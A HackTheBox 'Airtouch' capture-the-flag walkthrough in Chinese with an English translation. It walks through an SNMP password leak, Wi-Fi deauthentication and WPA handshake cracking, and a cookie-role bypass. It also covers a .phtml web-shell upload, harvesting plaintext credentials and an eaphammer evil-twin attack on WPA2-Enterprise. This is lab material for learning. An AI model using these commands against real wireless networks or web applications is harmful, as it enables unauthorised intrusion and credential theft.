HackTheBox Airtouch Writeup
HackTheBox Airtouch 是一台中等难度的 Linux 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 或域权限的利用链。
htb airtouch
Information Gathering
进行TCP扫描只有22端口开放
进行UDP扫描:sudo nmap -sU --top-ports 100 -sV 10.129.244.98
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Vulnerability Analysis
➜ AirTouch snmp-check 10.129.244.98
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.244.98:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.129.244.98
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
Contact : admin@AirTouch.htb
Location : "Consultant pc"
Uptime snmp : 00:31:29.75
Uptime system : 00:30:26.28
System date : -
使用consultant连接到目标
ssh consultant@10.129.244.98
# 输入密码RxBlZhLmOkacNWScmZ6D
进入后查看网络(ip a)发现有几个网卡wlan0~wlan6
并在主文件夹中发现diagram-net.png文件
查看该图片

可以看到我们处在黄色区域,我们的目标是到达绿色企业网络中
Exploitation (User Flag)
启用wifi监听模式
sudo airmon-ng start wlan0
命令执行后:
接口改名:
原本的网卡 wlan0 消失了,取而代之的是 wlan0mon(mon 代表 monitor)。
- 注意:以后您执行命令时,都要用
wlan0mon这个新名字,而不是wlan0。
sudo airmon-ng start wlan0 = “把我的 0 号无线网卡变成监听模式,准备开始抓包。”
开始监听
sudo airodump-ng wlan0mon
sudo airodump-ng wlan0mon = “用我的监听网卡,扫描周围所有的 Wi-Fi 信号,并把详细信息列出来。”

BSSID是mac地址 CH是信道
抓包
# 解释:
# -c 6 : 只监听 6 号信道 (不再乱跳)
# --bssid ...: 只过滤目标路由器的 MAC 地址 (屏蔽无关噪音)
# -w capture : 将抓到的数据包保存为文件,文件名前缀叫 capture
# wlan0mon : 您的监听网卡
sudo airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w capture wlan0mon
发现F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 54 -54 0 62 AirTouch-Internet
将其踢掉线让其重新输入WiFi密码
# -0 10 : 发送 10 次攻击包 (不够可以加到 20 或 50)
# -a [BSSID] : 路由器的 MAC 地址
# -c [STATION]: 客户端/受害者的 MAC 地址 (请替换下面的问号)
# wlan0mon : 您的网卡名
sudo aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon
这时在第一个窗口看到WPA handshake: F0:9F:C2:A3:F1:A7时证明拿到了破解密码所需的全部数据
破解密码
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
得到challenge(Tablets vlan的wifi密码)
生成连接配置文件
wpa_passphrase AirTouch-Internet challenge > wpa_internet.conf
echo "p2p_disabled=1" >> wpa_internet.conf
使用 wpa_supplicant 加载刚才的配置文件,通过 wlan1 网卡连接。
# -B: 在后台运行 (Background)
# -i: 指定网卡 (Interface)
# -c: 指定配置文件 (Config)
sudo wpa_supplicant -B -i wlan1 -c wpa_internet.conf
向路由器申请IP地址
sudo dhclient wlan1
扫描存活主机
# 扫描 192.168.3.x 网段的所有主机
for i in {1..254}; do ping -c 1 -W 1 192.168.3.$i > /dev/null 2>&1 & done; wait; echo "扫描结束,请查看 ARP 表"
# 查看arp表
ip neigh
192.168.3.1 dev wlan1 lladdr f0:9f:c2:a3:f1:a7 STALE
查看192.168.3.1有没有开放端口
# 设置要扫描的目标 IP
target="192.168.3.1"
echo "正在扫描 $target ..."
# 扫描常用的前 1000 个端口 (可以修改 {1..1000} 为 {1..65535})
for port in {20..1000}; do
# 利用 /dev/tcp 特性尝试连接,不输出错误信息
(echo > /dev/tcp/$target/$port) >/dev/null 2>&1 && echo "🔓 发现开放端口: $port" &
done; wait
echo "扫描完成。"
保存在一个文件中
consultant@AirTouch-Consultant:~$ bash scan.sh
正在扫描 192.168.3.1 ...
🔓 发现开放端口: 22
🔓 发现开放端口: 53
🔓 发现开放端口: 80
转发80端口
sshpass -p 'RxBlZhLmOkacNWScmZ6D' ssh -L 8080:192.168.3.1:80 consultant@10.129.244.98
打开后是一个登陆界面
在 Wireshark 里解密流量
搜素eapol
配置 Wireshark 来自动解密这个 Wi-Fi 的所有流量(前提是抓到了握手包):
- 在 Wireshark 菜单栏:Edit (编辑) -> Preferences (首选项)。
- 展开 Protocols (协议) -> 找到 IEEE 802.11。
- 点击 Decryption keys (解密密钥) 旁边的 Edit (编辑)。
- 添加一条新记录:
- Key type:
wpa-pwd - Key:
challenge:AirTouch-Internet(格式是密码:SSID)
- Key type:
- 点击 OK。
然后搜索http.cookie可以发现PHPSESSID=2h7gtgfa6q8dsk5gev2eir8473; UserRole=user
利用此cookie并把UserRole改为admin即可绕过登录
登陆后是一个可以上传文件的界面
上传php得到:Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.
通过更改文件名字为shell.phtml即可绕过此登陆界面
我们使用此webphp,上传后查看login.php得到密码JunDRDZKHDnpkpDDvay和2wLFYNh4TSTgA5sNgT4
if (isset($_POST['Submit'])) {
/* Define username, associated password, and user attribute array */
$logins = array(
/*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
);
ssh user@192.168.3.1
# 输入密码JunDRDZKHDnpkpDDvay
即可进入user,sudo -l 依然是all
升级权限后在root文件夹中得到user.txt以及send_certs.txt
root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash
# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
Privilege Escalation (Root Flag)
/root中发现了一个名为 send_certs.sh 的脚本。该脚本会自动将证书备份到网络中的下一跳:AirTouch-Office 网关 ( 10.10.10.1 )。该脚本包含名为 remote 的用户的明文凭据。
我们已到达企业 VLAN ( 10.10.10.0/24 ) 的边缘。WiFi 网络 AirTouch-Office 使用 WPA2-Enterprise (802.1X) 加密。与家庭/PSK 网络不同,该网络使用 RADIUS 服务器对单个用户进行身份验证,通常通过用户名和密码 (PEAP-MSCHAPv2) 进行验证。
你不能用破解预共享密钥(PSK)的方式来“破解”WPA2-Enterprise 数据包。相反,我们必须执行邪恶双胞胎攻击。
监听5GHz以窃取AirTouch-Office
consultant@AirTouch-Consultant:~$ sudo airodump-ng --band a wlan0mon
CH 108 ][ Elapsed: 24 s ][ 2026-01-25 17:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:AA:3F:D2 -28 15 1 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:F3:A1:13 -28 15 1 0 44 54e WPA2 CCMP MGT AirTouch-Office
52:49:1E:8E:B7:5F -28 280 0 0 1 54 TKIP PSK vodafoneFB6N
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 28:6C:07:12:EE:A1 -29 0 - 1 0 2 AirTouch-Office
AC:8B:A9:F3:A1:13 C8:8A:9A:6F:F9:D2 -29 0 - 6e 460 7 AccessLink,AirTouch-Office
使用工具eaphammer进行邪恶双胞胎攻击
# 假设您的网卡是 wlan4 (请根据实际情况修改 -i 参数)
sudo ./eaphammer -i wlan4 \
--essid AirTouch-Office \
--creds \
--server-cert server.crt \
--private-key server.key \
--ca-cert ca.crt \
--auth wpa-eap \
--channel 44
重新开一个终端将网卡固定在44频道
sudo airodump-ng -c 44 wlan0mon
尝试踢掉用户
# 语法:sudo aireplay-ng -0 [攻击次数] -a [真实AP的MAC] -c [受害者MAC] [接口]
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c [] wlan0mon
# 或者广播攻击(暴力容易被发现)
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0mon
得到jtr NETNTLM: r4ulcl:a4c27aa6b39622a3$9f984f937bb10edd63e22f25bcb9af3b545b5843631392d2
破解r4ulcl:laboratory
配置网络
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="laboratory"
phase2="auth=MSCHAPV2"
}
sudo wpa_supplicant -i wlan3 -c wpa.conf -B连接网络
sudo dhclient wlan3申请ip
连接remote
ssh remote@10.10.10.1
# 密码xGgWEwqUpfoOVsLeROeG
查看进程ps -ef
root 46 28 0 17:06 ? 00:00:09 hostapd_aps /root/mgt/hostapd_wpe.conf
root 47 28 0 17:06 ? 00:00:09 hostapd_aps /root/mgt/hostapd_wpe2.conf
最后在/etc/hostapd/hostapd_wpe.eap_user
得到admin:xMJpzXt4D9ouMuL3JJsMriF7KZozm7
最后sudo su
Lessons Learned
HTB airtouch
Information Gathering
Conducting a TCP scan only reveals port 22 as open.
Conducting a UDP scan: sudo nmap -sU --top-ports 100 -sV 10.129.244.98
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Vulnerability Analysis
➜ AirTouch snmp-check 10.129.244.98
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.244.98:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.129.244.98
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
Contact : admin@AirTouch.htb
Location : "Consultant pc"
Uptime snmp : 00:31:29.75
Uptime system : 00:30:26.28
System date : -
Connect to the target using the consultant account.
ssh consultant@10.129.244.98
# Enter the password RxBlZhLmOkacNWScmZ6D
After logging in, checking the network (ip a) reveals several network interfaces from wlan0 to wlan6.
A file named diagram-net.png is also found in the home directory.
Viewing the image

We can see that we are in the yellow zone, and our objective is to reach the green corporate network.
Exploitation (User Flag)
Enable WiFi monitoring mode
sudo airmon-ng start wlan0
After executing the command:
Interface renamed:
The original network card wlan0 disappears and is replaced by wlan0mon (mon stands for monitor).
- Note: From now on, use the new name
wlan0monfor all commands, notwlan0.
sudo airmon-ng start wlan0 = “Put my wireless card number 0 into monitoring mode, ready to start packet capture.”
Start monitoring
sudo airodump-ng wlan0mon
sudo airodump-ng wlan0mon = “Use my monitoring card to scan all surrounding Wi-Fi signals and list detailed information.”

BSSID is the MAC address, CH is the channel
Capture packets
# Explanation:
# -c 6 : Only monitor channel 6 (no more random hopping)
# --bssid ...: Only filter for the target router's MAC address (block irrelevant noise)
# -w capture : Save captured packets to files with the prefix 'capture'
# wlan0mon : Your monitoring card
sudo airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w capture wlan0mon
Found F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 54 -54 0 62 AirTouch-Internet
Kick it offline to force it to re-enter the WiFi password
# -0 10 : Send 10 attack packets (increase to 20 or 50 if needed)
# -a [BSSID] : Router's MAC address
# -c [STATION]: Client/victim's MAC address (replace the question mark below)
# wlan0mon : Your card name
sudo aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon
At this point, seeing WPA handshake: F0:9F:C2:A3:F1:A7 in the first window means all data needed for password cracking has been captured
Crack the password
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Obtain challenge (the WiFi password for Tablets vlan)
Generate connection configuration file
wpa_passphrase AirTouch-Internet challenge > wpa_internet.conf
echo "p2p_disabled=1" >> wpa_internet.conf
Use wpa_supplicant to load the configuration file just created and connect via the wlan1 card.
# -B: Run in background
# -i: Specify interface
# -c: Specify configuration file
sudo wpa_supplicant -B -i wlan1 -c wpa_internet.conf
Request an IP address from the router
sudo dhclient wlan1
Scan for live hosts
# Scan all hosts in the 192.168.3.x subnet
for i in {1..254}; do ping -c 1 -W 1 192.168.3.$i > /dev/null 2>&1 & done; wait; echo "Scan complete, check ARP table"
# View ARP table
ip neigh
192.168.3.1 dev wlan1 lladdr f0:9f:c2:a3:f1:a7 STALE
Check if 192.168.3.1 has open ports
# Set target IP to scan
target="192.168.3.1"
echo "Scanning $target ..."
# Scan the first 1000 common ports (change {1..1000} to {1..65535} if needed)
for port in {20..1000}; do
# Use /dev/tcp feature to attempt connection, suppress error output
(echo > /dev/tcp/$target/$port) >/dev/null 2>&1 && echo "🔓 Open port found: $port" &
done; wait
echo "Scan complete."
Save to a file
consultant@AirTouch-Consultant:~$ bash scan.sh
Scanning 192.168.3.1 ...
🔓 Open port found: 22
🔓 Open port found: 53
🔓 Open port found: 80
Forward port 80
sshpass -p 'RxBlZhLmOkacNWScmZ6D' ssh -L 8080:192.168.3.1:80 consultant@10.129.244.98
Opening it reveals a login interface
Decrypting traffic in Wireshark
Search for eapol
Configure Wireshark to automatically decrypt all traffic for this Wi-Fi (requires captured handshake):
- In the Wireshark menu bar: Edit -> Preferences.
- Expand Protocols -> find IEEE 802.11.
- Click Edit next to Decryption keys.
- Add a new entry:
- Key type:
wpa-pwd - Key:
challenge:AirTouch-Internet(format ispassword:SSID)
- Key type:
- Click OK.
Then search for http.cookie to find PHPSESSID=2h7gtgfa6q8dsk5gev2eir8473; UserRole=user
Using this cookie and changing UserRole to admin allows bypassing login
After logging in, there is a file upload interface
Uploading PHP gives: Sorry, PHP and HTML files are not allowed. Sorry, your file was not uploaded.
Bypassing this restriction by changing the filename to shell.phtml
We use this webphp, after uploading and viewing login.php, we obtain the passwords JunDRDZKHDnpkpDDvay and 2wLFYNh4TSTgA5sNgT4
if (isset($_POST['Submit'])) {
/* Define username, associated password, and user attribute array */
$logins = array(
/*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
);
ssh user@192.168.3.1
# Enter password JunDRDZKHDnpkpDDvay
This allows entry as user, sudo -l still shows all
After privilege escalation, obtain user.txt and send_certs.txt from the root folder
root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash
# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
Privilege Escalation (Root Flag)
A script named send_certs.sh was found in /root. This script automatically backs up certificates to the next hop in the network: the AirTouch-Office gateway (10.10.10.1). The script contains plaintext credentials for a user named remote.
We have reached the edge of the corporate VLAN (10.10.10.0/24). The WiFi network AirTouch-Office uses WPA2-Enterprise (802.1X) encryption. Unlike home/PSK networks, this network uses a RADIUS server to authenticate individual users, typically via username and password (PEAP-MSCHAPv2).
You cannot “crack” WPA2-Enterprise packets in the way you would crack a pre-shared key (PSK). Instead, we must perform an Evil Twin attack.
Listen on 5GHz to capture AirTouch-Office
consultant@AirTouch-Consultant:~$ sudo airodump-ng --band a wlan0mon
CH 108 ][ Elapsed: 24 s ][ 2026-01-25 17:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:AA:3F:D2 -28 15 1 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:F3:A1:13 -28 15 1 0 44 54e WPA2 CCMP MGT AirTouch-Office
52:49:1E:8E:B7:5F -28 280 0 0 1 54 TKIP PSK vodafoneFB6N
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 28:6C:07:12:EE:A1 -29 0 - 1 0 2 AirTouch-Office
AC:8B:A9:F3:A1:13 C8:8A:9A:6F:F9:D2 -29 0 - 6e 460 7 AccessLink,AirTouch-Office
Use the tool eaphammer for the Evil Twin attack
# Assuming your network card is wlan4 (modify the -i parameter according to your actual situation)
sudo ./eaphammer -i wlan4 \
--essid AirTouch-Office \
--creds \
--server-cert server.crt \
--private-key server.key \
--ca-cert ca.crt \
--auth wpa-eap \
--channel 44
Open a new terminal and fix the network card to channel 44
sudo airodump-ng -c 44 wlan0mon
Attempt to deauthenticate the user
# Syntax: sudo aireplay-ng -0 [number of attacks] -a [MAC of the real AP] -c [victim MAC] [interface]
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c [] wlan0mon
# Or broadcast attack (aggressive and easily detectable)
sudo aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0mon
Obtained jtr NETNTLM: r4ulcl:a4c27aa6b39622a3$9f984f937bb10edd63e22f25bcb9af3b545b5843631392d2
Cracked r4ulcl:laboratory
Configure the network
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="laboratory"
phase2="auth=MSCHAPV2"
}
sudo wpa_supplicant -i wlan3 -c wpa.conf -B to connect to the network
sudo dhclient wlan3 to request an IP
Connect as remote
ssh remote@10.10.10.1
# Password xGgWEwqUpfoOVsLeROeG
Check processes ps -ef
root 46 28 0 17:06 ? 00:00:09 hostapd_aps /root/mgt/hostapd_wpe.conf
root 47 28 0 17:06 ? 00:00:09 hostapd_aps /root/mgt/hostapd_wpe2.conf
Finally, in /etc/hostapd/hostapd_wpe.eap_user
Found admin:xMJpzXt4D9ouMuL3JJsMriF7KZozm7
Finally sudo su